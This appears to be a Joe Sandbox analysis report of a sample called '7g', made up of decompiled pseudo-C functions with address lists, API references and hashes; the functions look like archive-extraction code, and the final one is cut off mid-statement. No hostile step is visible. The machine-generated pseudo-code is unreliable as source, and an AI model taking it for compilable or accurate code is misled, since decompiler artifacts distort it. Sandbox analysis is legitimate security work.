                                                                                                                    0x00000000
                                                                                                                    0x00b2471e
                                                                                                                    0x00b24621
                                                                                                                    0x00b2462f
                                                                                                                    0x00b24633
                                                                                                                    0x00b2463b
                                                                                                                    0x00b2463f
                                                                                                                    0x00b24657
                                                                                                                    0x00b24659
                                                                                                                    0x00b2466d
                                                                                                                    0x00b24674
                                                                                                                    0x00b24678
                                                                                                                    0x00b2468f
                                                                                                                    0x00b24692
                                                                                                                    0x00b24696
                                                                                                                    0x00b2469f
                                                                                                                    0x00b2469f
                                                                                                                    0x00b246a1
                                                                                                                    0x00b246ef
                                                                                                                    0x00b246f2
                                                                                                                    0x00b246f5
                                                                                                                    0x00000000
                                                                                                                    0x00b246fa
                                                                                                                    0x00b246a3
                                                                                                                    0x00b246a3
                                                                                                                    0x00b246a4
                                                                                                                    0x00b246e8
                                                                                                                    0x00000000
                                                                                                                    0x00b246e8
                                                                                                                    0x00b246a6
                                                                                                                    0x00b246a6
                                                                                                                    0x00b246a7
                                                                                                                    0x00b246e4
                                                                                                                    0x00b246e4
                                                                                                                    0x00000000
                                                                                                                    0x00b246e4
                                                                                                                    0x00b246a9
                                                                                                                    0x00b246a9
                                                                                                                    0x00b246aa
                                                                                                                    0x00b246dd
                                                                                                                    0x00000000
                                                                                                                    0x00b246dd
                                                                                                                    0x00b246ac
                                                                                                                    0x00b246ac
                                                                                                                    0x00b246ad
                                                                                                                    0x00b246d4
                                                                                                                    0x00000000
                                                                                                                    0x00b246d4
                                                                                                                    0x00b246af
                                                                                                                    0x00b246af
                                                                                                                    0x00b246b0
                                                                                                                    0x00b246cd
                                                                                                                    0x00b246b2
                                                                                                                    0x00b246b2
                                                                                                                    0x00b246b2
                                                                                                                    0x00000000
                                                                                                                    0x00b24698
                                                                                                                    0x00b24698
                                                                                                                    0x00b246b7
                                                                                                                    0x00b246b7
                                                                                                                    0x00000000
                                                                                                                    0x00b246b7

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B245BC
                                                                                                                      • Part of subcall function 00B169AB: __EH_prolog.LIBCMT ref: 00B169B0
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2654054672-0
                                                                                                                    • Opcode ID: 75697928605d1ebe629338fb703f7f7f391d1e364a806cda14add611a69ba9de
                                                                                                                    • Instruction ID: 65e511694a033961173fc2cfa6460b09eae91ce2f13908deade267c01a98c4c3
                                                                                                                    • Opcode Fuzzy Hash: 75697928605d1ebe629338fb703f7f7f391d1e364a806cda14add611a69ba9de
                                                                                                                    • Instruction Fuzzy Hash: 2E91F331900165DFCF21EBA8E881AEEBBF1EF45300F2444E9F94AAB661DB319D85C751
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B5C5F8 Relevance: 3.2, APIs: 2, Instructions: 206COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E00B5C5F8(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t121;
				void* _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr* _t144;
				intOrPtr _t149;
				signed int _t150;
				void* _t155;
				signed int _t191;
				void* _t196;
				signed int _t197;
				intOrPtr _t199;
				intOrPtr* _t201;
				void* _t203;
				void* _t210;

				_t210 = __eflags;
				L00B7F140(0xb878b2, _t203);
				_t201 = __ecx;
				_push(_t196);
				 *((intOrPtr*)(_t203 - 0x1c)) = __ecx;
				E00B581F7(_t203 - 0xa0);
				 *(_t203 - 4) = 0;
				 *((intOrPtr*)(_t203 - 0x2c)) = 0;
				 *((intOrPtr*)(_t203 - 0x28)) = 0;
				 *((intOrPtr*)(_t203 - 0x24)) = 0;
				 *(_t203 - 4) = 1;
				E00B56896(_t203 - 0x44);
				 *(_t203 - 4) = 2;
				E00B56896(_t203 - 0x38);
				 *(_t203 - 4) = 3;
				E00B5C33E(0, __ecx, __edx, _t196, __ecx, _t210, 0,  *((intOrPtr*)(_t203 + 0x10)), _t203 - 0xa0, _t203 - 0x2c, _t203 - 0x44);
				L00B53E7C(_t203 - 0x100, _t210,  *((intOrPtr*)(__ecx + 0x80)));
				_t197 = 0;
				_t211 =  *((intOrPtr*)(_t203 - 0x9c));
				 *(_t203 - 4) = 4;
				 *(_t203 - 0x14) = 0;
				if( *((intOrPtr*)(_t203 - 0x9c)) <= 0) {
					L23:
					_t121 =  *((intOrPtr*)(_t203 - 0x98));
					if(_t121 != 0) {
						 *((intOrPtr*)(_t201 + 0x78)) =  *((intOrPtr*)(_t201 + 0x78)) +  *((intOrPtr*)(_t121 +  *(_t203 - 0xa0) * 8));
						asm("adc [esi+0x7c], eax");
					}
					 *(_t203 - 4) = 3;
					_t122 = L00B57804(_t203 - 0x100); // executed
					E00B11E89(E00B11E89(E00B11E89(_t122,  *((intOrPtr*)(_t203 - 0x38))),  *((intOrPtr*)(_t203 - 0x44))),  *((intOrPtr*)(_t203 - 0x2c)));
					 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
					E00B580A9(_t203 - 0xa0);
					_t127 = 0;
					L26:
					 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
					return _t127;
				}
				while(1) {
					_t129 = E00B2000A( *((intOrPtr*)(_t203 + 0x14)), _t211);
					_t175 = _t129;
					 *((intOrPtr*)(_t203 - 0x18)) = _t129;
					_t191 = ( *( *((intOrPtr*)(_t203 - 0x6c)) + _t197) & 0x000000ff) +  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x74)) + _t197 * 4));
					_t132 =  *((intOrPtr*)(_t203 - 0x78));
					_t199 =  *((intOrPtr*)(_t132 + _t191 * 8));
					_t133 =  *((intOrPtr*)(_t132 + 4 + _t191 * 8));
					if(_t199 != _t199 || 0 != _t133) {
						break;
					}
					E00B14268(_t175, _t199);
					_push(0x14);
					_t144 = E00B11E55();
					if(_t144 == 0) {
						_t201 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t144 + 4)) = 0;
						 *_t144 = 0xb8a6bc;
						_t201 = _t144;
					}
					_t215 = _t201;
					 *((intOrPtr*)(_t203 - 0x48)) = _t201;
					if(_t201 != 0) {
						 *((intOrPtr*)( *_t201 + 4))(_t201);
					}
					 *(_t203 - 4) = 5;
					 *((intOrPtr*)(_t201 + 0x10)) = 0;
					 *((intOrPtr*)(_t201 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x18))));
					 *((intOrPtr*)(_t201 + 0xc)) = _t199;
					 *((char*)(_t203 - 0xd)) = 0;
					asm("adc ecx, [ebp+0xc]");
					_t183 = _t203 - 0x100;
					_t149 = E00B53FD5(_t203 - 0x100, _t215,  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x1c)))),  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0x10)))) +  *((intOrPtr*)(_t203 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0x10)) + 4)), _t203 - 0xa0,  *(_t203 - 0x14), 0, _t201, 0, 0, _t203 - 0xd,  *((intOrPtr*)(_t203 + 0x18)),  *((intOrPtr*)(_t203 + 0x1c)),  *((intOrPtr*)(_t203 + 0x20)),  *((intOrPtr*)(_t203 + 0x24)), 0, 1, 0, 0); // executed
					 *((intOrPtr*)(_t203 - 0x20)) = _t149;
					if(_t149 != 0) {
						L28:
						__eflags = _t201;
						 *(_t203 - 4) = 4;
						if(_t201 != 0) {
							 *((intOrPtr*)( *_t201 + 8))(_t201);
						}
						 *(_t203 - 4) = 3;
						E00B11E89(E00B11E89(E00B11E89(L00B57804(_t203 - 0x100),  *((intOrPtr*)(_t203 - 0x38))),  *((intOrPtr*)(_t203 - 0x44))),  *((intOrPtr*)(_t203 - 0x2c)));
						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
						E00B580A9(_t203 - 0xa0);
						_t127 =  *((intOrPtr*)(_t203 - 0x20));
						goto L26;
					} else {
						if( *((intOrPtr*)(_t203 - 0xd)) != 0) {
							 *((char*)( *((intOrPtr*)(_t203 - 0x1c)) + 0x3c)) = 1;
						}
						if(_t199 !=  *((intOrPtr*)(_t201 + 0x10))) {
							E00B5AEB1(_t183);
						}
						_t150 =  *(_t203 - 0x14);
						if(_t150 <  *((intOrPtr*)(_t203 - 0x90)) &&  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x94)) + _t150)) != 0) {
							 *((intOrPtr*)(_t203 - 0x18)) =  *((intOrPtr*)(_t203 - 0x88)) + _t150 * 4;
							_t155 = E00B7E140( *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x18)))), _t199);
							_t187 =  *((intOrPtr*)(_t203 - 0x18));
							if(_t155 !=  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x18))))) {
								E00B5AEB1(_t187);
							}
						}
						 *(_t203 - 4) = 4;
						if(_t201 != 0) {
							 *((intOrPtr*)( *_t201 + 8))(_t201);
						}
						 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
						if( *(_t203 - 0x14) <  *((intOrPtr*)(_t203 - 0x9c))) {
							_t197 =  *(_t203 - 0x14);
							continue;
						} else {
							_t201 =  *((intOrPtr*)(_t203 - 0x1c));
							goto L23;
						}
					}
				}
				_push(0xb98128);
				_push(_t203 + 0x13);
				L00B7F160();
				goto L28;
			}























                                                                                                                    0x00b5c5f8
                                                                                                                    0x00b5c5fd
                                                                                                                    0x00b5c60a
                                                                                                                    0x00b5c60c
                                                                                                                    0x00b5c613
                                                                                                                    0x00b5c616
                                                                                                                    0x00b5c61d
                                                                                                                    0x00b5c620
                                                                                                                    0x00b5c623
                                                                                                                    0x00b5c626
                                                                                                                    0x00b5c62c
                                                                                                                    0x00b5c630
                                                                                                                    0x00b5c638
                                                                                                                    0x00b5c63c
                                                                                                                    0x00b5c652
                                                                                                                    0x00b5c65a
                                                                                                                    0x00b5c66c
                                                                                                                    0x00b5c671
                                                                                                                    0x00b5c673
                                                                                                                    0x00b5c679
                                                                                                                    0x00b5c67d
                                                                                                                    0x00b5c680
                                                                                                                    0x00b5c7c4
                                                                                                                    0x00b5c7c4
                                                                                                                    0x00b5c7cc
                                                                                                                    0x00b5c7db
                                                                                                                    0x00b5c7de
                                                                                                                    0x00b5c7de
                                                                                                                    0x00b5c7e7
                                                                                                                    0x00b5c7eb
                                                                                                                    0x00b5c803
                                                                                                                    0x00b5c808
                                                                                                                    0x00b5c815
                                                                                                                    0x00b5c81a
                                                                                                                    0x00b5c81c
                                                                                                                    0x00b5c822
                                                                                                                    0x00b5c82a
                                                                                                                    0x00b5c82a
                                                                                                                    0x00b5c68b
                                                                                                                    0x00b5c68e
                                                                                                                    0x00b5c693
                                                                                                                    0x00b5c698
                                                                                                                    0x00b5c6a2
                                                                                                                    0x00b5c6a5
                                                                                                                    0x00b5c6a8
                                                                                                                    0x00b5c6ad
                                                                                                                    0x00b5c6b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5c6c0
                                                                                                                    0x00b5c6c5
                                                                                                                    0x00b5c6c7
                                                                                                                    0x00b5c6cf
                                                                                                                    0x00b5c6de
                                                                                                                    0x00b5c6de
                                                                                                                    0x00b5c6d1
                                                                                                                    0x00b5c6d1
                                                                                                                    0x00b5c6d4
                                                                                                                    0x00b5c6da
                                                                                                                    0x00b5c6da
                                                                                                                    0x00b5c6e0
                                                                                                                    0x00b5c6e2
                                                                                                                    0x00b5c6e5
                                                                                                                    0x00b5c6ea
                                                                                                                    0x00b5c6ea
                                                                                                                    0x00b5c6fb
                                                                                                                    0x00b5c704
                                                                                                                    0x00b5c70a
                                                                                                                    0x00b5c710
                                                                                                                    0x00b5c716
                                                                                                                    0x00b5c735
                                                                                                                    0x00b5c73b
                                                                                                                    0x00b5c741
                                                                                                                    0x00b5c748
                                                                                                                    0x00b5c74b
                                                                                                                    0x00b5c841
                                                                                                                    0x00b5c841
                                                                                                                    0x00b5c843
                                                                                                                    0x00b5c847
                                                                                                                    0x00b5c84c
                                                                                                                    0x00b5c84c
                                                                                                                    0x00b5c855
                                                                                                                    0x00b5c871
                                                                                                                    0x00b5c876
                                                                                                                    0x00b5c883
                                                                                                                    0x00b5c888
                                                                                                                    0x00000000
                                                                                                                    0x00b5c751
                                                                                                                    0x00b5c754
                                                                                                                    0x00b5c759
                                                                                                                    0x00b5c759
                                                                                                                    0x00b5c760
                                                                                                                    0x00b5c762
                                                                                                                    0x00b5c762
                                                                                                                    0x00b5c767
                                                                                                                    0x00b5c770
                                                                                                                    0x00b5c78d
                                                                                                                    0x00b5c790
                                                                                                                    0x00b5c795
                                                                                                                    0x00b5c79a
                                                                                                                    0x00b5c79c
                                                                                                                    0x00b5c79c
                                                                                                                    0x00b5c79a
                                                                                                                    0x00b5c7a3
                                                                                                                    0x00b5c7a7
                                                                                                                    0x00b5c7ac
                                                                                                                    0x00b5c7ac
                                                                                                                    0x00b5c7af
                                                                                                                    0x00b5c7bb
                                                                                                                    0x00b5c688
                                                                                                                    0x00000000
                                                                                                                    0x00b5c7c1
                                                                                                                    0x00b5c7c1
                                                                                                                    0x00000000
                                                                                                                    0x00b5c7c1
                                                                                                                    0x00b5c7bb
                                                                                                                    0x00b5c74b
                                                                                                                    0x00b5c830
                                                                                                                    0x00b5c83b
                                                                                                                    0x00b5c83c
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B5C5FD
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B98128), ref: 00B5C83C
                                                                                                                      • Part of subcall function 00B11E55: malloc.MSVCRT ref: 00B11E68
                                                                                                                      • Part of subcall function 00B11E55: _CxxThrowException.MSVCRT(?,00B90098), ref: 00B11E82
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionThrow$H_prologmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3044594480-0
                                                                                                                    • Opcode ID: 0d733bb663792e1878cd2fb3be7df8b0bdf81a4c6ab6c456dbfd6399189b95f4
                                                                                                                    • Instruction ID: 42734ed9fea486d35416f97b15f593ffb8d9e82f83498c81007ac31c35f39d12
                                                                                                                    • Opcode Fuzzy Hash: 0d733bb663792e1878cd2fb3be7df8b0bdf81a4c6ab6c456dbfd6399189b95f4
                                                                                                                    • Instruction Fuzzy Hash: 7A915B75900249DFCB21DFA8C881AEEBBF5EF49300F6441D9E859A7251DB306E49CF61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B25E89 Relevance: 3.1, APIs: 2, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00B25E89() {
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr _t72;
				intOrPtr* _t73;
				intOrPtr _t75;
				intOrPtr* _t84;
				long _t96;
				intOrPtr _t98;
				struct _SECURITY_DESCRIPTOR* _t117;
				void* _t119;
				void* _t121;

				L00B7F140(0xb83d70, _t119);
				_t117 =  *(_t119 + 8);
				 *((intOrPtr*)(_t119 - 4)) = 0;
				 *((intOrPtr*)(_t119 - 0x10)) = _t121 - 0xc;
				if( *((intOrPtr*)(_t117 + 0x74)) == 0) {
					__eflags =  *((intOrPtr*)(_t117 + 0x138));
					if(__eflags != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x130)) + 0x1c)))) + 0xc))( *((intOrPtr*)(_t117 + 0xb2)),  *((intOrPtr*)(_t117 + 0xb0)), _t117 + 0x80);
						_t98 =  *((intOrPtr*)(_t117 + 0x130));
						 *((intOrPtr*)(_t117 + 0x108)) =  *((intOrPtr*)(_t98 + 0x10));
						 *((intOrPtr*)(_t117 + 0x10c)) =  *((intOrPtr*)(_t98 + 0x14));
						 *((char*)(_t117 + 0x3b)) = 1;
						L00B254B1(_t98);
						 *((char*)(_t117 + 0x138)) = 0;
					}
					_t66 = E00B25CBE(_t117, __eflags); // executed
					__eflags = _t66;
					if(_t66 == 0) {
						__eflags =  *((intOrPtr*)(_t117 + 0x3e));
						if( *((intOrPtr*)(_t117 + 0x3e)) != 0) {
							L16:
							__eflags =  *((intOrPtr*)(_t117 + 0x3b));
							if( *((intOrPtr*)(_t117 + 0x3b)) != 0) {
								L18:
								__eflags =  *((intOrPtr*)(_t117 + 0xb0));
								_t67 = _t117 + 0x1a8;
								if( *((intOrPtr*)(_t117 + 0xb0)) == 0) {
									_t67 = _t117 + 0x1a0;
								}
								 *_t67 =  *_t67 +  *((intOrPtr*)(_t117 + 0x108));
								asm("adc [eax+0x4], edx");
								L21:
								__eflags =  *((intOrPtr*)(_t117 + 0xb2));
								if( *((intOrPtr*)(_t117 + 0xb2)) == 0) {
									__eflags =  *((intOrPtr*)(_t117 + 0xb0));
									_t68 = _t117 + 0x198;
									if( *((intOrPtr*)(_t117 + 0xb0)) == 0) {
										_t68 = _t117 + 0x190;
									}
								} else {
									_t68 = _t117 + 0x188;
								}
								 *_t68 =  *_t68 + 1;
								asm("adc [eax+0x4], ebx");
								__eflags =  *((intOrPtr*)(_t117 + 0x38));
								if( *((intOrPtr*)(_t117 + 0x38)) != 0) {
									E00B25E39(_t117);
								}
								_t69 =  *((intOrPtr*)(_t117 + 0x50));
								__eflags =  *((intOrPtr*)(_t117 + 0x36));
								_t66 =  *((intOrPtr*)( *_t69 + 0x20))(_t69,  *((intOrPtr*)(_t119 + 0xc)), 0 |  *((intOrPtr*)(_t117 + 0x36)) != 0x00000000);
								goto L28;
							}
							L00B23A71(_t117);
							__eflags =  *((intOrPtr*)(_t117 + 0x3b));
							if( *((intOrPtr*)(_t117 + 0x3b)) == 0) {
								goto L21;
							}
							goto L18;
						}
						__eflags =  *((intOrPtr*)(_t117 + 0x31));
						if( *((intOrPtr*)(_t117 + 0x31)) == 0) {
							goto L16;
						}
						__eflags =  *((intOrPtr*)(_t117 + 0x20));
						if( *((intOrPtr*)(_t117 + 0x20)) == 0) {
							goto L16;
						}
						_t72 =  *((intOrPtr*)(_t117 + 0x1c));
						__eflags =  *((intOrPtr*)(_t72 + 8));
						if( *((intOrPtr*)(_t72 + 8)) == 0) {
							goto L16;
						}
						_t73 =  *((intOrPtr*)(_t72 + 8));
						 *((intOrPtr*)( *_t73 + 0x10))(_t73,  *((intOrPtr*)(_t117 + 0x104)), 0x3e, _t119 + 8, _t119 - 0x14, _t119 - 0x18);
						_t107 =  *((intOrPtr*)(_t119 - 0x14));
						__eflags =  *((intOrPtr*)(_t119 - 0x14));
						if( *((intOrPtr*)(_t119 - 0x14)) == 0) {
							goto L16;
						}
						__eflags =  *((intOrPtr*)(_t119 - 0x18)) - 1;
						if( *((intOrPtr*)(_t119 - 0x18)) == 1) {
							_t75 = L00B3DA24( *(_t119 + 8), _t107);
							__eflags = _t75;
							if(_t75 != 0) {
								__eflags =  *((intOrPtr*)(_t117 + 0x170));
								_t96 = 7;
								if( *((intOrPtr*)(_t117 + 0x170)) != 0) {
									_t96 = 0xf;
								}
								SetFileSecurityW( *(_t117 + 0xc0), _t96,  *(_t119 + 8));
							}
							goto L16;
						}
						_t66 = 0x80004005;
					}
					goto L28;
				} else {
					L00B23A71(_t117);
					_t84 =  *((intOrPtr*)(_t117 + 0x74));
					_t66 =  *((intOrPtr*)( *_t84 + 0x18))(_t84,  *((intOrPtr*)(_t119 + 0xc)), 0 |  *((intOrPtr*)(_t117 + 0x36)) != 0x00000000,  *((intOrPtr*)(_t117 + 0x108)),  *((intOrPtr*)(_t117 + 0x10c)));
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t119 - 0xc));
					return _t66;
				}
			}
















                                                                                                                    0x00b25e8e
                                                                                                                    0x00b25e98
                                                                                                                    0x00b25e9e
                                                                                                                    0x00b25ea4
                                                                                                                    0x00b25ea7
                                                                                                                    0x00b25ed6
                                                                                                                    0x00b25edc
                                                                                                                    0x00b25efe
                                                                                                                    0x00b25f01
                                                                                                                    0x00b25f0d
                                                                                                                    0x00b25f13
                                                                                                                    0x00b25f19
                                                                                                                    0x00b25f1d
                                                                                                                    0x00b25f22
                                                                                                                    0x00b25f22
                                                                                                                    0x00b25f2a
                                                                                                                    0x00b25f2f
                                                                                                                    0x00b25f31
                                                                                                                    0x00b25f37
                                                                                                                    0x00b25f3a
                                                                                                                    0x00b25fad
                                                                                                                    0x00b25fad
                                                                                                                    0x00b25fb0
                                                                                                                    0x00b25fbe
                                                                                                                    0x00b25fbe
                                                                                                                    0x00b25fc4
                                                                                                                    0x00b25fca
                                                                                                                    0x00b25fcc
                                                                                                                    0x00b25fcc
                                                                                                                    0x00b25fde
                                                                                                                    0x00b25fe0
                                                                                                                    0x00b25fe3
                                                                                                                    0x00b25fe3
                                                                                                                    0x00b25fe9
                                                                                                                    0x00b25ff3
                                                                                                                    0x00b25ff9
                                                                                                                    0x00b25fff
                                                                                                                    0x00b26001
                                                                                                                    0x00b26001
                                                                                                                    0x00b25feb
                                                                                                                    0x00b25feb
                                                                                                                    0x00b25feb
                                                                                                                    0x00b26007
                                                                                                                    0x00b2600a
                                                                                                                    0x00b2600d
                                                                                                                    0x00b26010
                                                                                                                    0x00b26014
                                                                                                                    0x00b26014
                                                                                                                    0x00b26019
                                                                                                                    0x00b2601e
                                                                                                                    0x00b2602b
                                                                                                                    0x00000000
                                                                                                                    0x00b2602b
                                                                                                                    0x00b25fb4
                                                                                                                    0x00b25fb9
                                                                                                                    0x00b25fbc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25fbc
                                                                                                                    0x00b25f3c
                                                                                                                    0x00b25f3f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25f41
                                                                                                                    0x00b25f44
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25f46
                                                                                                                    0x00b25f49
                                                                                                                    0x00b25f4c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25f51
                                                                                                                    0x00b25f68
                                                                                                                    0x00b25f6b
                                                                                                                    0x00b25f6e
                                                                                                                    0x00b25f70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25f72
                                                                                                                    0x00b25f76
                                                                                                                    0x00b25f85
                                                                                                                    0x00b25f8a
                                                                                                                    0x00b25f8c
                                                                                                                    0x00b25f8e
                                                                                                                    0x00b25f96
                                                                                                                    0x00b25f97
                                                                                                                    0x00b25f9b
                                                                                                                    0x00b25f9b
                                                                                                                    0x00b25fa7
                                                                                                                    0x00b25fa7
                                                                                                                    0x00000000
                                                                                                                    0x00b25f8c
                                                                                                                    0x00b25f78
                                                                                                                    0x00b25f78
                                                                                                                    0x00000000
                                                                                                                    0x00b25ea9
                                                                                                                    0x00b25eab
                                                                                                                    0x00b25eb6
                                                                                                                    0x00b25ece
                                                                                                                    0x00b2603b
                                                                                                                    0x00b26040
                                                                                                                    0x00b26049
                                                                                                                    0x00b26049

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 2f34293b00d14d06ca66ddc9b6ad5ce624ff13049705f90a75df71136df5486c
                                                                                                                    • Instruction ID: b1622fa6c09778bc8abddd07db82039dcaecd3a6bc368719e95a8b5e55acf937
                                                                                                                    • Opcode Fuzzy Hash: 2f34293b00d14d06ca66ddc9b6ad5ce624ff13049705f90a75df71136df5486c
                                                                                                                    • Instruction Fuzzy Hash: 3951BBB1504B90AFCB31DB20D590AEBBBE1FF45304F18889EE0DA8B202D730B985CB41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B15B2F Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B15B2F(WCHAR* __ecx, void* __eflags) {
				void* __esi;
				signed char _t40;
				long _t41;
				long _t44;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr* _t63;
				signed int _t71;
				signed int _t72;
				void* _t74;
				WCHAR* _t77;
				signed int _t78;
				void* _t80;

				L00B7F140(E00B82D9C, _t80);
				_t77 = __ecx; // executed
				_t40 = E00B1692E(__ecx); // executed
				if(_t40 == 0xffffffff || (_t40 & 0x00000010) == 0) {
					_t41 = E00B1859C(_t77, __eflags);
					__eflags = _t41;
					if(_t41 == 0) {
						_t74 = E00B1862A(_t77, _t77);
						E00B12DD3(_t80 - 0x18, _t77);
						_t55 = 0;
						 *((intOrPtr*)(_t80 - 4)) = 0;
						_t44 = L00B132A6(_t80 - 0x18);
						__eflags = _t44;
						if(__eflags < 0) {
							L10:
							E00B12EA8(_t80 - 0x24, __eflags, _t80 - 0x18);
							_t78 =  *(_t80 - 0x14);
							 *((char*)(_t80 - 4)) = 1;
							while(1) {
								L11:
								_t63 =  *((intOrPtr*)(_t80 - 0x18));
								while(1) {
									_t47 = E00B15C70(_t63); // executed
									__eflags = _t47;
									if(_t47 != 0) {
										goto L22;
									}
									_t47 = GetLastError();
									__eflags = _t47 - 0xb7;
									if(_t47 != 0xb7) {
										_t78 = L00B132A6(_t80 - 0x18);
										__eflags = _t78 - _t55;
										if(__eflags >= 0 && __eflags != 0) {
											_t63 =  *((intOrPtr*)(_t80 - 0x18));
											__eflags = _t78 - 1;
											if(_t78 != 1) {
												L19:
												_t19 = _t78 + 1; // 0x1
												_t47 = _t19;
												__eflags = _t74 - _t19;
												if(_t74 < _t19) {
													__eflags = _t78 -  *(_t80 - 0x14);
													if(_t78 >=  *(_t80 - 0x14)) {
														continue;
													} else {
														 *(_t80 - 0x14) = _t78;
														 *(_t63 + _t78 * 2) = _t55;
														goto L11;
													}
													goto L30;
												}
											} else {
												_t47 =  *_t63;
												__eflags = _t47 - 0x5c;
												if(_t47 != 0x5c) {
													__eflags = _t47 - 0x2f;
													if(_t47 != 0x2f) {
														goto L19;
													}
												}
											}
										}
									}
									L29:
									_t44 = E00B11E89(_t47,  *((intOrPtr*)(_t80 - 0x24)));
									goto L30;
								}
								while(1) {
									L22:
									__eflags = _t78 -  *(_t80 - 0x20);
									if(_t78 >=  *(_t80 - 0x20)) {
										break;
									}
									_t51 = E00B18297( *((intOrPtr*)(_t80 - 0x24)) + 2 + _t78 * 2);
									__eflags = _t51 - _t55;
									if(_t51 >= _t55) {
										_t78 = _t78 + _t51 + 1;
									} else {
										_t78 =  *(_t80 - 0x20);
									}
									E00B12FD0(_t80 - 0x18,  *((intOrPtr*)(_t80 - 0x24)), _t78);
									_t47 = L00B15A99( *((intOrPtr*)(_t80 - 0x18)));
									__eflags = _t47;
									if(_t47 != 0) {
										continue;
									} else {
									}
									goto L29;
								}
								_t55 = 1;
								goto L29;
							}
						} else {
							_t72 =  *(_t80 - 0x14);
							_t71 = _t72 - 1;
							__eflags = _t44 - _t71;
							if(__eflags != 0) {
								goto L10;
							} else {
								__eflags = _t72 - 1;
								if(__eflags != 0) {
